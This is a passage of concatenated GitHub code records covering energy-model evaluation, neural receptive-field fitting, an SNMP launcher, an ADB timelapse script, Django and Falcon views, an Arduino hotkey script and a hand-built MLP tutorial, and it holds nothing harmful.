'MWh')\nprint()\nprint(\"==============================================================\")\nprint()\nprint(\"cross validation scores\")\nprint(\"Static model RME = \" + str(round(static_rmse, 2)) + 'MWh')\nprint(\"Lasso model RME = \" + str(round(np.mean(lass_rmse_scores), 2)) + 'MWh')\nprint(\"Elastic Net model RME = \" + str(round(np.mean(ela_rmse_scores), 2)) + 'MWh')\nprint(\"Linear Regression model RME = \" + str(round(np.mean(lin_rmse_scores), 2)) + 'MWh')\nprint(\"Random Forest model RME = \" + str(round(np.mean(random_forest_rmse_scores), 2)) + 'MWh')\nprint()\n# convert periods to days\ndays = np.arange(len(y_ela_prediction))/48\nmax_days = 10*48\n\n# Plot data on one graph.\nplt.rcParams[\"figure.figsize\"] = (30, 10)\nmodel = [y_static_pred, y_ela_prediction, y_lin_prediction, y_lass_prediction, y_random_forest_prediction, y_validate]\nname = ['Static', 'Elastic Net', 'Linear Regression', 'Lasso', 'Random Forests', 'NIV']\ncolour = ['m', 'b', 'y', 'g', 'c']\n\nfor y_data, c, l in zip(model[:-1], colour, name[:-1]):\n    plt.plot(days[:max_days], y_data[:max_days], color=c, linewidth=2, linestyle='solid', label=l)\nplt.plot(days[:max_days], y_validate.values[:max_days], color='k', linewidth=2, linestyle='dashed')\nplt.title('All models: Comparison of First 100 Validation Values')\nplt.xlabel('Days')\nplt.ylabel('NIV')\nplt.legend()\nplt.show()\n\n# Plot data on separate graphs\nfor y_data, l in zip(model, name):\n    plt.plot(days[:max_days], y_validate.values[:max_days], color='k', linewidth=2, linestyle='dashed')\n    plt.plot(days[:max_days], y_data[:max_days], color='b')\n    plt.xlabel('Days')\n    plt.ylabel('NIV')\n    plt.title(l)\n    plt.show()\n","repo_name":"JohnCLong/SEF_ML","sub_path":"initial models/All_models.py","file_name":"All_models.py","file_ext":"py","file_size_in_byte":13915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20597572880","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom scipy.ndimage import gaussian_filter\r\nfrom scipy.optimize import curve_fit\r\nfrom probes_coord import dim_calculator\r\n\r\n\r\ndef stimulus_averaged_responses(stim, dataset):\r\n    \"\"\"Average response to a stimulus\r\n    This function calculates the average response to each stimulus. 
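Trials are grouped by stimulus code (1-100) and averaged across repetitions. 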
For each \r\n probe location, 96 response values (each for an electrode) are calculated.\r\n \"\"\"\r\n averaged_responses = np.zeros((100, 96))\r\n for i in np.arange(1, 101):\r\n averaged_responses[i - 1, :] = np.mean(dataset[stim == i, :], axis=0)\r\n return averaged_responses\r\n\r\n\r\ndef RF(averaged_responses, electrode):\r\n \"\"\"Electrode receptive field data\r\n This function chooses the mean responses of an electrode to all the probe \r\n locations.\r\n \"\"\"\r\n RF_electrode = averaged_responses[:, electrode]\r\n return RF_electrode\r\n\r\n\r\ndef RF_plotter(RF_electrode, v_min, v_max, filename):\r\n \"\"\"Receptive field Plotter\r\n This function plots receptive field of an electrode\r\n \"\"\"\r\n fig = plt.figure(figsize=(9, 12))\r\n RF_electrode = np.reshape(RF_electrode, (10, 10)).T\r\n RF_electrode = gaussian_filter(RF_electrode, sigma=0.8)\r\n plt.imshow(RF_electrode, interpolation='bilinear', vmin=v_min, vmax=v_max)\r\n plt.xticks(np.array([0, 9]), [-36, 0])\r\n plt.yticks(np.array([0, 9]), [2, -34])\r\n plt.xlabel('Position(deg)', fontsize=40, fontweight='bold')\r\n plt.ylabel('Position(deg)', fontsize=40, fontweight='bold')\r\n plt.subplots_adjust()\r\n cax = plt.axes([1, 0.23, 0.03, 0.1])\r\n plt.colorbar(cax=cax).set_ticks([v_min, v_max])\r\n plt.show()\r\n fig.savefig(filename, dpi=150)\r\n\r\n\r\ndef RF_set_viewer(stim, dataset, electrode_set, v_min, v_max, filename):\r\n \"\"\"Group RF plotter\r\n This function plots receptive fields of a group of electrodes\r\n \"\"\"\r\n fig = plt.figure(figsize=(15, 15))\r\n averaged_responses = stimulus_averaged_responses(stim, dataset)\r\n c = 1\r\n for electrode in electrode_set:\r\n RF_electrode = RF(averaged_responses, electrode)\r\n RF_electrode = np.reshape(RF_electrode, (10, 10)).T\r\n RF_electrode = gaussian_filter(RF_electrode, sigma=0.8)\r\n fig.add_subplot(10, 10, c)\r\n plt.imshow(RF_electrode, interpolation='bilinear', vmin=v_min, vmax=v_max)\r\n plt.gca().axes.get_xaxis().set_ticks([])\r\n plt.gca().axes.get_yaxis().set_ticks([])\r\n c = c + 1\r\n plt.show()\r\n fig.savefig(filename, dpi=350)\r\n\r\n\r\ndef tuning_plotter(stim, dataset, electrode, v_min, v_max, filename):\r\n \"\"\"Tuning curve plotter\r\n Plots tuning curve (region) of an electrode\r\n \"\"\"\r\n averaged_responses = stimulus_averaged_responses(stim, dataset)\r\n RF_electrode = RF(averaged_responses, electrode)\r\n RF_electrode = np.reshape(RF_electrode, (10, 10)).T\r\n fig = plt.figure(figsize=(5, 5))\r\n plt.imshow(RF_electrode, vmin=v_min, vmax=v_max)\r\n plt.xticks(np.array([0, 9]), [-36, 0])\r\n plt.yticks(np.array([0, 9]), [2, -34])\r\n plt.xlabel('Position(deg)', fontweight='bold')\r\n plt.ylabel('Position(deg)', fontweight='bold')\r\n plt.subplots_adjust()\r\n cax = plt.axes([1, 0.23, 0.03, 0.1])\r\n plt.colorbar(cax=cax).set_ticks([v_min, v_max])\r\n plt.show()\r\n fig.savefig(filename, dpi=150)\r\n\r\n\r\ndef tuning_plotterP3(stim, dataset, electrode, v_min, v_max, filename):\r\n \"\"\"Tuning curve plotter\r\n Plots tuning curve (region) of an electrode\r\n \"\"\"\r\n averaged_responses = stimulus_averaged_responses(stim, dataset)\r\n RF_electrode = RF(averaged_responses, electrode)\r\n RF_electrode = np.reshape(RF_electrode, (10, 10)).T\r\n fig = plt.figure(figsize=(5, 5))\r\n plt.imshow(RF_electrode, vmin=v_min, vmax=v_max)\r\n plt.xticks(np.array([0, 9]), [-36 + 20, 0 + 20])\r\n plt.yticks(np.array([0, 9]), [2, -34])\r\n plt.xlabel('Position(deg)', fontweight='bold')\r\n plt.ylabel('Position(deg)', fontweight='bold')\r\n 
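# draw the colorbar in its own axes to the right of the map\r\n    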
plt.subplots_adjust()\r\n cax = plt.axes([1, 0.23, 0.03, 0.1])\r\n plt.colorbar(cax=cax).set_ticks([v_min, v_max])\r\n plt.show()\r\n fig.savefig(filename, dpi=150)\r\n\r\n\r\ndef two_d_gaussian(x, A, x1_0, x2_0, sigma_x1, sigma_x2, d):\r\n \"\"\"2D Gaussian\r\n 2D Gaussian function that takes x as input and outputs a corresponding \r\n Gaussian value. This will be called by gaussian_RF function.\r\n \"\"\"\r\n return A * np.exp(\r\n -((x[:, 0] - x1_0) ** 2 / (2 * sigma_x1 ** 2)) - ((x[:, 1] - x2_0) ** 2 / (2 * sigma_x2 ** 2))) + d\r\n\r\n\r\ndef gaussian_RF(RF_electrode, x1_0, x2_0, sigma_x1, sigma_x2):\r\n \"\"\"\r\n This function fits a 2D Gaussian to the Receptive field of an electrode in \r\n terms of its x-y locations on the grid\r\n \"\"\"\r\n dim = dim_calculator()\r\n popt, pcov = curve_fit(two_d_gaussian, dim, RF_electrode, p0=[1, x1_0, x2_0, sigma_x1, sigma_x2, 0],\r\n bounds=([-2, -36, -34, 2, 2, -2], [3, 0, 2, 30, 30, 2]))\r\n RF_gaussian = two_d_gaussian(dim, *popt)\r\n return RF_gaussian, popt\r\n\r\n\r\ndef gaussian_RF_P3(RF_electrode, x1_0, x2_0, sigma_x1, sigma_x2):\r\n \"\"\"\r\n This function fits a 2D Gaussian to the Receptive field of an electrode in \r\n terms of its x-y locations on the grid\r\n \"\"\"\r\n dim = dim_calculator()\r\n popt, pcov = curve_fit(two_d_gaussian, dim, RF_electrode, p0=[1, x1_0, x2_0, sigma_x1, sigma_x2, 0],\r\n bounds=([-2, -36 + 20, -34, 2, 2, -2], [3, 0 + 20, 2, 30, 30, 2]))\r\n RF_gaussian = two_d_gaussian(dim, *popt)\r\n return RF_gaussian, popt\r\n\r\n\r\ndef FWHM_gaussian(param_G):\r\n \"\"\"Gaussian FWHM\r\n This function calculates full width at half maximum (FWHM) of the fitted \r\n Gaussian to a receptive field. It takes as input parameters of the fitted \r\n Gaussian\r\n \"\"\"\r\n X = np.arange(-36, 4, 4)\r\n Y = np.arange(2, -38, -4)\r\n X, Y = np.meshgrid(X, Y)\r\n Z = param_G[0] * np.exp(\r\n -((X - param_G[1]) ** 2 / (2 * param_G[3] ** 2)) - ((Y - param_G[2]) ** 2 / (2 * param_G[4] ** 2))) + param_G[\r\n 5] - (param_G[5] + param_G[0]) / 2\r\n return X, Y, Z\r\n\r\n\r\ndef FWHM_gaussian_P3(param_G):\r\n \"\"\"Gaussian FWHM\r\n This function calculates full width at half maximum (FWHM) of the fitted \r\n Gaussian to a receptive field. It takes as input parameters of the fitted \r\n Gaussian\r\n \"\"\"\r\n X = np.arange(-36 + 20, 4 + 20, 4)\r\n Y = np.arange(2, -38, -4)\r\n X, Y = np.meshgrid(X, Y)\r\n Z = param_G[0] * np.exp(\r\n -((X - param_G[1]) ** 2 / (2 * param_G[3] ** 2)) - ((Y - param_G[2]) ** 2 / (2 * param_G[4] ** 2))) + param_G[\r\n 5] - (param_G[5] + param_G[0]) / 2\r\n return X, Y, Z\r\n\r\n\r\ndef RF_diameter(param_G):\r\n \"\"\"RF diameter\r\n This function takes the parameters of the fitted Gaussian to calculate \r\n diameters of FWHM ellipse\r\n \"\"\"\r\n Dx = 2 * np.abs(param_G[3]) * np.sqrt(-2 * np.log(1 / 2 - (1 / 2) * (param_G[5] / param_G[0])))\r\n Dy = 2 * np.abs(param_G[4]) * np.sqrt(-2 * np.log(1 / 2 - (1 / 2) * (param_G[5] / param_G[0])))\r\n return Dx, Dy\r\n\r\n\r\ndef population_contours(dataset, stim, electrode_set, sigm, clr):\r\n \"\"\"RF contours from a group of electrodes\r\n This function plots fitted FWHM ellipse to receptive fields of a group of \r\n electrodes. 
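Each contour is the half-maximum level set of the Gaussian fitted to that electrode's RF. 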
In addition, it returns the mean RF diameter of all the electrodes \r\n    in the electrode_set.\r\n    \"\"\"\r\n    dim = dim_calculator()\r\n    averaged_responses = stimulus_averaged_responses(stim, dataset)\r\n    RF_mean_diameter = np.zeros(len(electrode_set))\r\n    c = 0\r\n    for electrode in electrode_set:\r\n        RF_electrode = RF(averaged_responses, electrode)\r\n        ind = np.argmax(RF_electrode)\r\n        x1_0, x2_0, sigma_x1, sigma_x2 = dim[ind, 0], dim[ind, 1], sigm, sigm\r\n        RF_G, param_G = gaussian_RF(RF_electrode, x1_0, x2_0, sigma_x1, sigma_x2)\r\n        X, Y, Z = FWHM_gaussian(param_G)\r\n        Dx, Dy = RF_diameter(param_G)\r\n        D = 0.5 * (Dx + Dy)\r\n        RF_mean_diameter[c] = D\r\n        plt.contour(X, Y, Z, [0], colors=clr, linewidths=2)\r\n        c = c + 1\r\n    plt.xlabel('Position(deg)', fontsize=40, fontweight='bold')\r\n    plt.ylabel('Position(deg)', fontsize=40, fontweight='bold')\r\n    return RF_mean_diameter\r\n\r\n\r\ndef RFCenterPosition(dataset, stim, electrode_set, sigm):\r\n    \"\"\"RF centers\r\n    This function determines the coordinates of the receptive field centers \r\n    obtained from the fitted Gaussian\r\n    \"\"\"\r\n    dim = dim_calculator()\r\n    averaged_responses = stimulus_averaged_responses(stim, dataset)\r\n    RF_center_position = np.zeros((len(electrode_set), 2))\r\n    c = 0\r\n    for electrode in electrode_set:\r\n        RF_electrode = RF(averaged_responses, electrode)\r\n        ind = np.argmax(RF_electrode)\r\n        x1_0, x2_0, sigma_x1, sigma_x2 = dim[ind, 0], dim[ind, 1], sigm, sigm\r\n        RF_G, param_G = gaussian_RF(RF_electrode, x1_0, x2_0, sigma_x1, sigma_x2)\r\n        RF_center_position[c, :] = param_G[1], param_G[2]\r\n        c = c + 1\r\n    return RF_center_position\r\n\r\n\r\ndef RFCenterEccentricity(RF_center_position):\r\n    \"\"\"RF centers eccentricity\r\n    This function calculates the eccentricity of the receptive field centers\r\n    \"\"\"\r\n    RF_center_eccentricity = np.sqrt(RF_center_position[:, 0] ** 2 + RF_center_position[:, 1] ** 2)\r\n    return RF_center_eccentricity\r\n\r\n\r\ndef RFDiameterEccentricityPlot(RF_center_eccentricity, RF_mean_diameter, trace_color, figure_title, file_name):\r\n    \"\"\"RF diameters vs eccentricity\r\n    This function plots the diameter of the receptive fields versus their \r\n    center eccentricity\r\n    \"\"\"\r\n    fig = plt.figure(figsize=(12, 8))\r\n    ind = np.argsort(RF_center_eccentricity)\r\n    plt.scatter(RF_center_eccentricity[ind], RF_mean_diameter[ind], marker=\"^\", s=200, c=trace_color)\r\n    plt.axis('tight')\r\n    plt.tight_layout()\r\n    plt.ylim(0, 40)\r\n    plt.xlim(0, 40)\r\n    plt.ylabel('RF Diameter', fontweight='bold')\r\n    plt.xlabel('RF Center Eccentricity', fontweight='bold')\r\n    plt.title(figure_title, fontweight='bold', loc='center')\r\n    plt.show()\r\n    fig.savefig(file_name, dpi=350)\r\n\r\n\r\ndef ECConArray(RF_center_eccentricity, electrode_set, plxarray, filename):\r\n    \"\"\"Eccentricity plotted on the array\r\n    This function plots the eccentricity of each electrode on its location on \r\n    the electrode array\r\n    \"\"\"\r\n    fig = plt.figure(figsize=(9, 12))\r\n    Aray_ecc = np.zeros(100)\r\n    Aray_ecc[electrode_set] = RF_center_eccentricity\r\n    plt.imshow(Aray_ecc[plxarray - 1], vmin=0, vmax=40)\r\n    plt.gca().axes.get_xaxis().set_ticks([])\r\n    plt.gca().axes.get_yaxis().set_ticks([])\r\n    plt.title('RF Eccentricity', fontweight='bold')\r\n    plt.subplots_adjust()\r\n    cax = plt.axes([1, 0.25, 0.05, 0.2])\r\n    plt.colorbar(cax=cax).set_ticks([0, 40]) # rect = [left, bottom, width, height]\r\n    plt.show()\r\n    fig.savefig(filename, 
dpi=350)\r\n","repo_name":"Armin12/Decoding-Population-Activity-in-V4","sub_path":"RF_calc.py","file_name":"RF_calc.py","file_ext":"py","file_size_in_byte":10759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13160325437","text":"import sys\nimport subprocess\n\nfrom optparse import OptionParser\nfrom snmposter import SNMPosterFactory\n\n\ndef launcher():\n    \"\"\"Launch it.\"\"\"\n    parser = OptionParser()\n    parser.add_option(\n        '-f',\n        '--file',\n        dest='filename',\n        default='agents.csv',\n        help='snmposter configuration file'\n    )\n    options, args = parser.parse_args()\n\n    factory = SNMPosterFactory()\n\n    snmpd_status = subprocess.Popen(\n        [\"service\", \"snmpd\", \"status\"],\n        stdout=subprocess.PIPE\n    ).communicate()[0]\n\n    if \"is running\" in snmpd_status:\n        message = \"snmpd service is running. Please stop it and try again.\"\n        print >> sys.stderr, message\n        sys.exit(1)\n\n    try:\n        factory.configure(options.filename)\n    except IOError:\n        print >> sys.stderr, \"Error opening %s.\" % options.filename\n        sys.exit(1)\n\n    factory.start()\n","repo_name":"cluther/snmposter","sub_path":"snmposter/scripts.py","file_name":"scripts.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"32"} +{"seq_id":"19963728087","text":"import time\n\nfrom ppadb.client import Client as AdbClient\n\n\ndelay_between_takes = 3 # in seconds\ntotal_amount_of_takes = 10\nshutter_speed = 10 # in seconds\n\n\ndef connect():\n    client = AdbClient(host=\"127.0.0.1\", port=5037)\n\n    devices = client.devices()\n\n    if len(devices) == 0:\n        print('No devices')\n        quit()\n\n    device = devices[0]\n\n    print(f'Connected to {device}')\n\n    return device, client\n\nif __name__ == '__main__':\n    device, client = connect()\n\n    for i in range(total_amount_of_takes):\n        device.shell('input keyevent 25')\n        time.sleep(shutter_speed+delay_between_takes)\n","repo_name":"uvsq21705818/adbtimelapse","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71240106009","text":"import io\nimport os\n\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.http import StreamingHttpResponse, HttpResponse\nfrom django.views import View\nfrom django.views.generic import ListView, DetailView\n\nfrom .models import MapResult, RenderJob\n\n\nclass DownloaderView(LoginRequiredMixin, View):\n\n    @staticmethod\n    def get(request, *args, **kwargs):\n        map_result = MapResult.objects.by_guid(kwargs[\"pk\"])\n        if map_result is None:\n            return HttpResponse(status=403)\n        render_job = RenderJob.objects.get(guid=map_result.job.guid)\n        if render_job.owner != request.user:\n            return HttpResponse(status=403)\n        url = f\"files/{map_result.file}\"\n        filename = os.path.basename(url)\n        bf = io.open(url, \"rb\")\n        response = StreamingHttpResponse(streaming_content=bf)\n        response[\"Content-Disposition\"] = f'attachment; filename=\"{filename}\"'\n        return response\n\n\nclass FileListView(LoginRequiredMixin, ListView):\n    model = MapResult\n\n    def __init__(self, *args, **kwargs):\n        super().__init__(*args, **kwargs)\n        MapResult.objects.delete_invalid()\n\n    def get_queryset(self):\n        render_jobs = RenderJob.objects.by_owner(self.request.user)\n        return MapResult.objects.by_job(render_jobs)\n\n\nclass JobDetailView(LoginRequiredMixin, DetailView):\n    model = 
RenderJob\n","repo_name":"zigellsn/TerritoriumMapServerFrontend","sub_path":"fileserver/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"40895911878","text":"#!/usr/bin/python3\n\nimport json\nimport falcon\nfrom database import Database\n\nclass Country(object):\n\n    def on_get(self, req, resp, country):\n\n        db = Database()\n\n        country_details = db.fetch('countries', 'name', country)\n\n        resp.body = json.dumps(country_details)\n\n        resp.content_type = 'application/json'\n\n        resp.status = falcon.HTTP_200\n\nclass Countries(object):\n\n    def on_get(self, req, resp):\n\n        db = Database()\n\n        countries_data = db.fetchall('countries')\n\n        country_data = []\n\n        for country in countries_data:\n\n            country_record = dict()\n\n            country_record['name'] = country['name']\n\n            country_record['code'] = country['code']\n\n            country_data.append(country_record)\n\n        resp.body = json.dumps(country_data)\n\n        resp.content_type = 'application/json'\n\n        resp.status = falcon.HTTP_200\n","repo_name":"csmets/travel-wish-list","sub_path":"api/countries.py","file_name":"countries.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33838072882","text":"def multiply(num1: str, num2: str) -> str:\n    l1, l2 = len(num1), len(num2)\n    i, j, ans = 1, 1, 0\n    while i < l1 + 1 and j < l2 + 1:\n        ans += int(num1[-i]) * int(num2[-j]) * 10 ** (i + j - 2)\n        print(i, j, ans)\n        i += 1\n        if i > l1:\n            i = 1\n            j += 1\n    return str(ans)\n\n\n#print(multiply(\"2\", \"3\"))\nprint(multiply(num1 = \"123\", num2 = \"456\"))","repo_name":"Wilrinator/Leetcode","sub_path":"0043Multiply Strings.py","file_name":"0043Multiply Strings.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41985068667","text":"import pyfirmata\nimport time\nimport pyautogui\n\nboard = pyfirmata.Arduino('COM3')\n\nit = pyfirmata.util.Iterator(board)\nit.start()\n\nboard.digital[7].mode = pyfirmata.INPUT\nboard.digital[8].mode = pyfirmata.INPUT\n\n\nwhile True:\n    red = board.digital[7].read()\n    blue = board.digital[8].read()\n    if red:\n        pyautogui.hotkey('ctrl', 'c')\n    if blue:\n        pyautogui.hotkey('ctrl', 'v')\n    time.sleep(0.1)","repo_name":"MaisarahPauzi/arduino_pyfirmata_projects","sub_path":"control computer system/button_shortcut.py","file_name":"button_shortcut.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"14343470812","text":"\"\"\"\n\nDESCRIPTION:\n    \n    This project describes a simple implementation of a Multilayer Perceptron (MLP) Neural Network\n    \n    through manual coding (without the use of TensorFlow). A special kind of neuron was used \n    \n    for layers 2 and 3 (binary neurons). 
The goal is to define and train an MLP dedicated to the\n    \n    approximation of a function F(x)\n    \nDATASET \n\n    The dataset was generated manually using Fourier Series Transformation\n    \n    y= F(x) = a0 + a1 cos(x) + b1 sin(x) + a2 cos(2x) + b2 sin(2x)\n    \n    After generating the input and output data, the function F(x) was assumed to be unknown\n    \n    \nSTEPS\n    \n    1) Define the function F(x) and simulate input and output data\n    \n    2) Simulate the training and test sets and assume the function F(x) to be unknown\n    \n    3) Define precisely an MLP with 4 layers and 30 neurons\n    \n        L1 = input layer 1 neuron\n        \n        L2 = layer of size 18 = 2 groups of 9 neurons Z1 Z2 ...Z9 and U1 U2 ...U9\n        \n        L3 = layer of size 10 = 10 neurons S1...S10\n        \n        L4 = output layer of size 1 = 1 neuron denoted R\n        \n    4) Implement a program to compute the states of L2 and the states of L3\n    \n    for any given input x\n    \n    5) Plot the function G(x) versus x for x= 0, 0.01,0.02, ...0.99, 1\n    \n    6) Construct the MLP to predict the results of the training and test sets and \n    \n    estimate the mean square error by comparing it to the true output.\n    \n\n\"\"\"\n\n\n\n\"\"\" Import the libraries \"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport math\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport random\nfrom statistics import mean\n\n\n\n\"\"\" Select five (5) random numbers a0,a1,a2,b1,b2\"\"\"\n\nnp.random.seed(100)\na0= (np.random.uniform(low=-1, high=1, size=1)) \nnp.random.seed(67)\na1= (np.random.uniform(low=-1, high=1, size=1))\nnp.random.seed(706)\nb1= (np.random.uniform(low=-1, high=1, size=1))\nnp.random.seed(9)\na2= (np.random.uniform(low=-0.5, high=0.5, size=1))\nnp.random.seed(7)\nb2= (np.random.uniform(low=-0.5, high=0.5, size=1))\n\n\n\n\"\"\" Define the Fourier function to generate the input and output dataset\"\"\"\n\ndef func1 (a):\n    \n    result_func = a0 + (a1 * np.cos((a))) + (b1 * np.sin((a))) + (a2*np.cos(2*(a)) + (b2 * np.sin(2*(a))))\n    \n    return result_func \n\n\n\"\"\"Generate random numbers as input to the function\"\"\" \n\nnp.random.seed(56877)\n\nxplot= np.sort(np.random.uniform(low=0, high=1, size=50))\n\n\n\"\"\"Get the output data\"\"\" \n\nyplot=func1(xplot)\n\n\n\"\"\"Plot the Function F(x)\"\"\"\n\nplt.figure(figsize=(8, 6))\nplt.plot(xplot, yplot, color='r', marker='o')\nplt.ylabel('F(x)')\nplt.xlabel('x')\nplt.title('Plot of F(x) vs x')\n\n\n\n\"\"\"Generate random numbers as input training set to the function\"\"\" \n\nnp.random.seed(80008)\ntrain_set= np.sort(np.random.uniform(low=0, high=1, size=1000))\nnp.around(train_set[:10],decimals=3)\n\n\n\"\"\"Get the output data for the training set\"\"\"\n\ntrain_outputs= func1(train_set)\nnp.around(train_outputs[:10],decimals=3)\n\n\n\"\"\"Generate random numbers as input for the test set to the function\"\"\" \n\nrandom.seed(600)\ntest_set= np.sort(np.random.uniform(low=0, high=1, size=500))\nnp.around(test_set[:10],decimals=3)\n\n\n\"\"\"Get the output data for the test set\"\"\"\n\ntest_outputs= func1(test_set)\nnp.around(test_outputs[:10],decimals=3)\n\nx = np.sort(train_set)\n\n\"\"\"\n    Define the MLP Architecture with 4 layers\n\n\"\"\"\n\n\"\"\" Compute the binary states of layer 2 and layer 3\"\"\"\n\n\ndef states(x):\n    def g(v): #Binary activation function\n        if v>0:\n            return 1\n        if v<=0:\n            return 0\n\n    #layer2 defined as l2() with input x\n    def l2(x):\n        z=list()\n        u=list()\n        \n        for i in range(9): \n            za= x - ((i+1)/10)\n            zi = g(za)\n            z.append(zi) \n        for i in range(9):\n            ua = -x + ((i+1)/10)\n            ui = g(ua)\n            u.append(ui) \n        pl = 
(sum(z) + (9-sum (u)))/2 #define the position\n \n return z,u, pl\n \n z1,u1,pl=l2(x)\n \n def l3(x):\n z,u,pl = l2(x)\n J = []\n for i in range (10):\n if pl==i:\n a=1\n else:\n a=0\n J.append(a)\n return J, pl\n\n j1,pl=l3(x)\n \n return z1,u1,j1,pl\n\n\n\n\"\"\"\n Apply the program to the first 20 values x1 ... x20 in the training set and\n \n verify if the values taken by L2 and L3 correspond to the theoretically expected values\n\n\"\"\"\n\nb = []\nfor i in range(20): \n d=states(x[i])\n b.append(d) \nb = pd.DataFrame(b, columns=['z(L2)','u(L2)','L3','pl'])\na=pd.DataFrame(x[:20])\nc = pd.concat([b,a], axis=1)\nc.columns=['z(Layer 2)','u(Layer 2)','Layer 3','Location', 'input values of x']\nc\n\n\n\"\"\"\n\n Estimate the weights (Learning the weights) for the last layer\n \n\"\"\"\n\n\nx1= pd.DataFrame(train_set)\ny1= pd.DataFrame(train_outputs) \n\nd = pd.concat([x1,y1], axis=1)\nd.columns=['x','y']\n \n\"\"\"Learning of the weights for the last layer\"\"\"\n\nw1=mean(d[(d.x > 0) & (d.x < 0.1)].y)\nw2= mean(d[(d.x > 0.1) & (d.x < 0.2)].y)\nw3= mean(d[(d.x > 0.2) & (d.x < 0.3)].y)\nw4= mean(d[(d.x > 0.3) & (d.x < 0.4)].y)\nw5= mean(d[(d.x > 0.4) & (d.x < 0.5)].y)\nw6 = mean(d[(d.x > 0.5) & (d.x < 0.6)].y)\nw7 = mean(d[(d.x > 0.6) & (d.x < 0.7)].y)\nw8 = mean(d[(d.x > 0.7) & (d.x < 0.8)].y)\nw9 = mean(d[(d.x > 0.8) & (d.x < 0.9)].y)\nw10 = mean(d[(d.x > 0.9) & (d.x < 1.0)].y)\n\n\n\"\"\"Weights\"\"\"\n\nw1,w2,w3,w4,w5,w6,w7,w8,w9,w10\n\n\n\"\"\"Define the last layer architecture\"\"\"\n\ndef l4(x):\n p,b = l3(x) \n k = b/10\n k1 = (b+1)/10\n \n yv = w1*p[0] +w2*p[1] +w3*p[2] +w4*p[3] +w5*p[4] +w6*p[5] +w7*p[6] + w8*p[7] +w9*p[8] +w10*p[9] \n return yv\n\n\n\"\"\"\n Combine the layers to give a full description of the MLP Architecture\n \n\"\"\" \n\ndef y1(x):\n def g(v): #Binary activation function\n if v>0:\n return 1\n if v<=0:\n return 0\n\n #layer2 defined as l2() with input x\n def l2(x):\n z=list()\n u=list()\n \n for i in range(9): \n za= x - ((i+1)/10)\n zi = g(za)\n z.append(zi) \n for i in range(9):\n ua = -x + ((i+1)/10)\n ui = g(ua)\n u.append(ui) \n pl = (sum(z) + (9-sum (u)))/2\n \n return z,u, pl\n \n z1,u1,pl=l2(x)\n \n def l3(x):\n z,u,pl = l2(x)\n J = []\n for i in range (10):\n if pl==i:\n a=1\n else:\n a=0\n J.append(a)\n return J, pl\n\n j1,pl=l3(x) \n\n x1= pd.DataFrame(train_set)\n y1= pd.DataFrame(train_outputs) \n\n d = pd.concat([x1,y1], axis=1)\n d.columns=['x','y']\n \n w1=mean(d[(d.x > 0) & (d.x < 0.1)].y)\n w2= mean(d[(d.x > 0.1) & (d.x < 0.2)].y)\n w3= mean(d[(d.x > 0.2) & (d.x < 0.3)].y)\n w4= mean(d[(d.x > 0.3) & (d.x < 0.4)].y)\n w5= mean(d[(d.x > 0.4) & (d.x < 0.5)].y)\n w6 = mean(d[(d.x > 0.5) & (d.x < 0.6)].y)\n w7 = mean(d[(d.x > 0.6) & (d.x < 0.7)].y)\n w8 = mean(d[(d.x > 0.7) & (d.x < 0.8)].y)\n w9 = mean(d[(d.x > 0.8) & (d.x < 0.9)].y)\n w10 = mean(d[(d.x > 0.9) & (d.x < 1.0)].y)\n \n def l4(x):\n p,b = l3(x) \n k = b/10\n k1 = (b+1)/10\n \n yv = w1*p[0] +w2*p[1] +w3*p[2] +w4*p[3] +w5*p[4] +w6*p[5] +w7*p[6] + w8*p[7] +w9*p[8] +w10*p[9] \n return yv\n yv = l4(x)\n \n return yv\n \n\n\"\"\"\n Implement the program and compute G(x)\n\n\"\"\"\n\nbb= pd.DataFrame(np.arange(0.0, 1.0, 0.01).tolist()) #Define the input x\nbb2= np.arange(0.0, 1.0, 0.01).tolist()\nh1h=func1(bb) #Apply the MLP function to generate the output\ngg=[]\nfor i in range(100): \n bbmp= y1(bb2[i]) \n gg.append(bbmp) \n\n\n \n\"\"\"\n Plot the function G(x) versus x for x= 0, 0.01,0.02, ...0.99, 1\n \n On the same graph plot the (assumed unknown) function F(x)\n 
\n\"\"\"\n\nplt.figure(figsize=(9, 7))\nplt.plot(bb,gg,color='b', marker='o', label='G(x)')\nplt.plot(bb,h1h,color='r', marker='o', label='F(x)')\nplt.ylabel('G(x)/F(x)')\nplt.xlabel('x')\nplt.title('Plot of G(x) and F(x) vs x')\nplt.legend(bbox_to_anchor=(0.85, 0.98), loc='upper left', borderaxespad=0.)\n\n\n\"\"\"\n    \n    Compute the training set prediction\n    \n    Compute the test set prediction\n    \n    Compare the mean square error for both\n    \n\"\"\"\n\n\n\n\n\"\"\" Training Set Prediction \"\"\"\n\n\npredtr=[]\nfor i in range(1000): \n    pp= y1(x[i]) \n    predtr.append(pp)\n    \nprederr=abs(predtr-train_outputs)\n\n\n\n\"\"\" Mean Square Error for Training Set \"\"\"\n\nmsetr= (sum((prederr*prederr)))/1000 \n'{0:.6f}'.format(msetr)\n\n\n\n\n\"\"\"Plot of Predicted Result and True Output (Training Set)\"\"\"\n\nplt.figure(figsize=(8, 6))\nplt.plot(train_set,train_outputs,color='b', marker='o', label='True Output')\nplt.plot(train_set,predtr,color='r', marker='o', label='Predicted Output')\nplt.ylabel('Result (y)')\nplt.xlabel('Input value (x)')\nplt.title('Plot of Predicted Result and True Output (Training 